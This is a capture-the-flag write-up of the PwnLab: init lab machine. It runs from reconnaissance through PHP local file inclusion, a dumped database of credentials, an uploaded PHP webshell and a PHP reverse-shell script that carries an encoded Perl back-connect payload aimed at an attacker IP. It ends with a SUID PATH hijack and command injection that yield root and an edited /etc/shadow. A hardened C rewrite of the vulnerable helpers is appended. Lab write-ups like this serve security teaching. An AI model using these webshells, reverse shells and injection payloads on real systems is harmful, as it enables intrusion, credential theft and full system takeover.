Range 71

nmap scan
```
$ nmap 172.17.135.71 -sS -Pn -O

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-23 21:03 CST
Nmap scan report for 172.17.135.71
Host is up (0.0034s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 3 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.27 seconds
```
dirb scan
```
$ dirb http://172.17.135.71 ctf/dir/php.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu May 23 21:12:43 2019
URL_BASE: http://172.17.135.71/
WORDLIST_FILES: ctf/dir/php.txt

-----------------

GENERATED WORDS: 3355

---- Scanning URL: http://172.17.135.71/ ----
+ http://172.17.135.71//index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../ (CODE:200|SIZE:332)
+ http://172.17.135.71//index.php (CODE:200|SIZE:332)
+ http://172.17.135.71//config.php (CODE:200|SIZE:0)
+ http://172.17.135.71//login.php (CODE:200|SIZE:250)
+ http://172.17.135.71//upload.php?action=upfile (CODE:200|SIZE:19)
+ http://172.17.135.71//upload.php (CODE:200|SIZE:19)
+ http://172.17.135.71//upload/ (CODE:200|SIZE:4774)
+ http://172.17.135.71//../admin (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin.php (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/default (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/default.php (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/index (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/index.php (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/login (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/login.php (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/manage (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/manage.php (CODE:400|SIZE:305)

-----------------
END_TIME: Thu May 23 21:12:51 2019
DOWNLOADED: 3355 - FOUND: 17

$ dirb http://172.17.135.71 ctf/dir/dir.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu May 23 21:13:38 2019
URL_BASE: http://172.17.135.71/
WORDLIST_FILES: ctf/dir/dir.txt

-----------------

GENERATED WORDS: 1170

---- Scanning URL: http://172.17.135.71/ ----
+ http://172.17.135.71//images/ (CODE:200|SIZE:942)
+ http://172.17.135.71//upload (CODE:301|SIZE:315)
+ http://172.17.135.71//images (CODE:301|SIZE:315)

-----------------
END_TIME: Thu May 23 21:13:41 2019
DOWNLOADED: 1170 - FOUND: 3
```
Suspicious location: http://172.17.135.71/index.php?page=login. A page name is passed in the parameter, so try supplying a PHP stream wrapper (pseudo-protocol) instead. Background on PHP wrappers: https://lorexxar.cn/2016/09/14/php-wei/

http://172.17.135.71/index.php?page=php://filter/read=convert.base64-encode/resource=index.php returns nothing, because the parameter is a bare page name (?page=login) and the script appends the .php extension itself, so use php://filter/read=convert.base64-encode/resource=index instead.
index.php

```php
<?php
if (isset($_COOKIE['lang'])) {
    include("lang/".$_COOKIE['lang']);
}
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page'])) {
    include($_GET['page'].".php");
} else {
    echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
```
login

```php
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass'])) {
    $luser = $_POST['user'];
    $lpass = base64_encode($_POST['pass']);

    $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
    $stmt->bind_param('ss', $luser, $lpass);
    $stmt->execute();
    $stmt->store_result();
    if ($stmt->num_rows == 1) {
        $_SESSION['user'] = $luser;
        header('Location: ?page=upload');
    } else {
        echo "Login failed.";
    }
} else {
?>
<form action="" method="POST">
<label>Username: </label><input id="user" type="text" name="user"><br />
<label>Password: </label><input id="pass" type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
</form>
<?php
}
```
config

```php
<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
```
upload

```php
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload' />
</form>
</body>
</html>
<?php
if (isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename  = $_FILES['file']['name'];
        $filetype  = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext  = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg", ".jpeg", ".gif", ".png");

        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        }
        if (strpos($filetype, 'image') === false) {
            die('Error 001');
        }
        if ($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg' && $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        }
        if (substr_count($filetype, '/') > 1) {
            die('Error 003');
        }
        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])) . $file_ext;

        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"" . $uploadfile . "\"><br />";
        } else {
            die('Error 4');
        }
    }
}
?>
```
The next step is to log in to MySQL with the credentials from config.php and dump the login passwords.
```
$ mysql -uroot -h 172.17.135.71 -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 23929
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.00 sec)
```

Base64-decoded:

```
kent JWzXuBJJNy
mike SIfdsTEn6I
kane iSv5Ym2GRo
```
After logging in, trying to upload a file: the checks are too strict and nothing gets through. Auditing the code turns up this instead:
```php
if (isset($_COOKIE['lang'])) {
    include("lang/".$_COOKIE['lang']);
}
```
References
Write a webshell whose only job is to write out another webshell file
```php
GIF89a
<?php
$file = fopen("divint3.php", "w");
// single-quoted so that $_POST[divint3] is written literally rather than interpolated
$ma = '<?php @eval($_POST[divint3]); ?>';
fwrite($file, $ma);
fclose($file);
```
Since I did not know where the dropped file ended up, this attempt failed. Using a small one-line shell instead: the upload landed at upload/068ae40523a24c9ef54edefd375e542d.gif, and after configuring AntSword (蚁剑) the connection succeeded. The file divint3.php was there, but the divint3.php in the web root did not contain what I had defined, which is left open. A likely cause: in the dropper as first written, `$ma` was a double-quoted string, so PHP interpolated `$_POST[divint3]` at write time instead of storing the literal text.
```
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
```
```
lsb_release -a
getconf GNU_LIBC_VERSION
glibc 2.19
```
Tried privilege escalation via pt_chown; no effect.
Reverse shell script
```php
<?php
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}

function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = '';
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}

function cf($fname, $text) {
    if ($fp = @fopen($fname, 'w')) {
        @fputs($fp, @base64_decode($text));
        @fclose($fp);
    }
}

$yourip   = "10.160.108.146";
$yourport = "2333";
$usedb    = array('perl' => 'perl', 'c' => 'c');
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"
    . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR"
    . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT"
    . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI"
    . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi"
    . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl"
    . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc', $back_connect);
$res = execute(which('perl') . " /tmp/.bc $yourip $yourport &");
```
First check which shells are available
```
(www-data:/var/www/html) $ cat /etc/shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
```
Bouncing a shell back with nc from the non-login shell returns a non-interactive shell; `python -c "import pty;pty.spawn('/bin/rbash')"` gives an interactive one.
su to kane with the password iSv5Ym2GRo succeeds and yields a fake flag: flag{T5566Y}
Look at .bash_history
```
kane@pwnlab:~$ cat .bash_history
cat .bash_history
uid
id
ls
./222.sh
ls
cd /hmoe
cd /home
ls
cd /mike
cat mike
ls -al
cd ~
ls -al
echo '/bin/sh' >> 222.sh
chmod 777 222.sh
ls
./222.sh
echo `/bin/sh`
export PATH=./:$PATH
./msgike
ls -al
./msgmike
echo '/bin/sh' > cat
chmod 777 cat
ls
./msgmike
```
Check the SUID files again
```
kane@pwnlab:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/home/kane/msgmike
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
```
msgmike has the SUID bit set
```
kane@pwnlab:~$ ls -la
ls -la
total 40
drwxr-x--- 2 kane kane 4096 May 26 03:19 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw------- 1 kane kane  244 Apr 25 09:53 .bash_history
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
-rwxrwxrwx 1 kane kane   10 May 21 09:56 cat
-rw-r--r-- 1 root root   13 Apr 25 10:32 flag_wrong.txt
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile
```
A rough look at msgmike
```
(raw ELF bytes from dumping msgmike, mostly unprintable; the readable strings are:)
/lib/ld-linux.so.2
cat /home/mike/msg.txt
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4
msgmike.c
system@@GLIBC_2.0
setreuid@@GLIBC_2.0
setregid@@GLIBC_2.0
__libc_start_main@@GLIBC_2.0
main
```
One string stands out: `cat /home/mike/msg.txt`, which should be the command the binary wraps. Because `cat` is invoked without an absolute path, the SUID binary resolves it through the caller's PATH. The file's owner is mike. The history contains `export PATH=./:$PATH`, so we build a line of our own along the same lines:
```
export PATH=/home/kane:$PATH
```
```
kane@pwnlab:~$ echo $PATH
echo $PATH
/home/kane:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
```
Check the permissions of the first directory in PATH
```
kane@pwnlab:/usr/local$ ls -lad bin
ls -lad bin
drwxrwsr-x 2 root staff 4096 Mar 17  2016 bin
```
Modify the cat file in the current directory
```
kane@pwnlab:~$ echo "/bin/bash;ls " > cat
```
Run ./msgmike again
```
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$
```
Now there is a SUID file owned by root, and the same approach as above applies.
```
mike@pwnlab:/home/mike$ ls -la
ls -la
total 28
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile
```
Run it once
```
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: flag{T5566Y}
flag{T5566Y}
flag{T5566Y}
```
Copy it to /tmp and inspect its contents with AntSword
The embedded command is presumably:

```
/bin/echo %s >> /root/messages.txt
```
Guessed source (my reconstruction; it compiles, but it is a guess):

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    char a[200];
    char s[500];
    printf("Message for root: ");
    if (!fgets(a, sizeof a, stdin)) return 1;
    a[strcspn(a, "\n")] = '\0';
    /* the message is pasted into a shell command line unescaped */
    sprintf(s, "/bin/echo %s >> /root/messages.txt", a);
    printf("%s\n", s);
    system(s);
    return 0;
}
```
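For comparison, an added example that is not from this writeup and not PwnLab's own msgmike/msg2root source: the same two helpers written in C without the two flaws used above. msgmike calls `system("cat /home/mike/msg.txt")`, so `cat` is resolved through the caller's PATH; msg2root pastes the message into a shell command with `sprintf` and `system`, so `;`, quotes and backticks in the message become shell syntax. The fix in both cases is to stop involving a shell: run the reader with `execve` on an absolute path and a fixed environment, and append the message with `write(2)` instead of building a command. The file paths below are placeholders, and `looks_like_shell_injection` is a hypothetical helper for reviewing what users sent to such a program.

```c
/* Added example (not from the writeup or the PwnLab binaries).
 * Placeholder paths; a real helper would point at the protected files. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* msgmike's problem: system("cat ...") looks up "cat" via the caller's PATH.
 * Here: no shell, absolute path, and an environment the caller cannot set. */
int show_file_as_owner(const char *abs_path)
{
    const char *argv[] = { "/bin/cat", abs_path, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };   /* caller's PATH ignored */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], (char *const *)argv, envp);
        _exit(127);                       /* execve only returns on failure */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* msg2root's problem: sprintf(s, "/bin/echo %s >> file", a); system(s).
 * Here: the message never touches a shell; it is written to the file directly,
 * after a length check and a one-line check. Returns 0 on success, -1 otherwise. */
#define MSG_MAX 200

int append_message(const char *abs_path, const char *msg)
{
    size_t len = strlen(msg);
    if (len == 0 || len > MSG_MAX) return -1;        /* bound what is accepted */
    if (strchr(msg, '\n')) return -1;                 /* one message per line */
    int fd = open(abs_path, O_WRONLY | O_APPEND | O_CREAT, 0600);
    if (fd < 0) return -1;
    int rc = 0;
    if (write(fd, msg, len) != (ssize_t)len || write(fd, "\n", 1) != 1) rc = -1;
    if (close(fd) != 0) rc = -1;
    return rc;
}

/* Review-side helper (hypothetical): does this message contain characters that
 * would have changed the meaning of a command built with sprintf+system?
 * With append_message() above they are harmless; the flag is for log review. */
int looks_like_shell_injection(const char *msg)
{
    return strpbrk(msg, ";|&`$\"'<>()\n") != NULL;
}

int main(void)
{
    char buf[MSG_MAX + 2];
    printf("Message for root: ");
    if (!fgets(buf, sizeof buf, stdin)) return 1;
    buf[strcspn(buf, "\n")] = '\0';
    if (looks_like_shell_injection(buf))
        fprintf(stderr, "note: message contains shell metacharacters (stored literally)\n");
    /* placeholder path standing in for /root/messages.txt */
    if (append_message("/tmp/messages.txt", buf) != 0) return 1;
    return show_file_as_owner("/tmp/messages.txt");
}
```

Fed the input from the sed attempts further down, this version simply stores the text as a line in the file; nothing in it is ever parsed by a shell, and a directory placed first in the caller's PATH has no effect on which `cat` runs.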
```
a;sed -i 's@^root.*@root:$6$k/mtF8Ic$.whWyn0EQI4q3rucHh3iYK.E6gTmbG3l1KoaQpnFrvs.bD2gw.JCvip1Jt4As5Vz7XKvgWAOz0L/iwaM2aDwp/:18042:0:99999:7:::@g$' /etc/shadow;echo 0
/bin/echo "";sed "s@^root.*@root:$6$k/mtF8Ic$.whWyn0EQI4q3rucHh3iYK.E6gTmbG3l1KoaQpnFrvs.bD2gw.JCvip1Jt4As5Vz7XKvgWAOz0L/iwaM2aDwp/:18042:0:99999:7:::@g" /etc/shadow;echo "hello" >> /root/messages.txt
a;a=\";echo $a;echo a
```
From the sed attempt it is clear that the program just echoes back what I typed; but what about input containing backticks? The attempts above had no effect. No luck; late at night I decided to fall back to plain commands and do the swap the honest way.
```
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: "";grep "root" /etc/shadow;echo ""
"";grep "root" /etc/shadow;echo ""

root:$6$aYZMZ3V0$qAYwiR7aanVmKSWyV5IbRffspdjFx4xhLrm8kbHhh1DG16Bdb0/ptImcDK2uT.6xc/FZotacYr0X4dB0SurjD/:16877:0:99999:7:::
```
```
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: "";cp /bin/bash /home/kane/sh;chmod +s /home/kane/sh;echo ""
"";cp /bin/bash /home/kane/sh;chmod +s /home/kane/sh;echo ""

mike@pwnlab:/home/mike$ cd
cd
mike@pwnlab:~$ ls
ls
cat  flag_wrong.txt  msgmike  sh  tq
mike@pwnlab:~$ ls -la
ls -la
total 1160
drwxr-x--- 2 kane kane    4096 May 26 17:47 .
drwxr-xr-x 6 root root    4096 Mar 17  2016 ..
-rw------- 1 kane kane    1245 May 26 10:36 .bash_history
-rw-r--r-- 1 kane kane     220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane    3515 Mar 17  2016 .bashrc
-rwxrwxrwx 1 kane kane      14 May 26 17:01 cat
-rw-r--r-- 1 root root      13 Apr 25 10:32 flag_wrong.txt
-rwsr-sr-x 1 mike mike    5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane     675 Mar 17  2016 .profile
-rwsr-sr-x 1 root root 1105840 May 26 17:47 sh
-rwsr-sr-x 1 root root   38868 May 26 17:42 tq
mike@pwnlab:~$ sh
sh
sh-4.3 whoami
whoami
root
sh-4.3
```
Source a few files (/etc/bash.bashrc, /etc/profile, /root/.profile, /root/.bashrc), then forcibly edit /etc/shadow with vi; login succeeds.
```
root@pwnlab:/home/kane# id
id
uid=0(root) gid=0(root) groups=0(root)
```
```
root@pwnlab:~# cat flag.txt
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)   _____                             _                           (_ ___)
(__  _)  /  __ \                           | |                          (__  _)
( _ __)  | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                     ( _ __)
(__  _)  | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                    (__  _)
(_ ___)  | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                    (_ ___)
(__  _)   \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                    (__  _)
( _ __)                      __/ |                                      ( _ __)
(__  _)                     |___/                                       (__  _)
(__  _)                                                                 (__  _)
(_ ___) If you are reading this, means that you have break 'init'       (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing       ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me your feedback or your writeup, I will love       ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _) For sniferl4bs.com                                              (__  _)
( _ __) claor@PwnLab.net - @Chronicoder                                 ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'
root@pwnlab:~#
```
Summary of the steps:

```sh
python -c "import pty;pty.spawn('/bin/rbash')"
su kane -c "iSv5Ym2GRo"
cd /home/kane
export PATH=/home/kane:$PATH
echo "/bin/bash;ls " > cat
./msgmike
```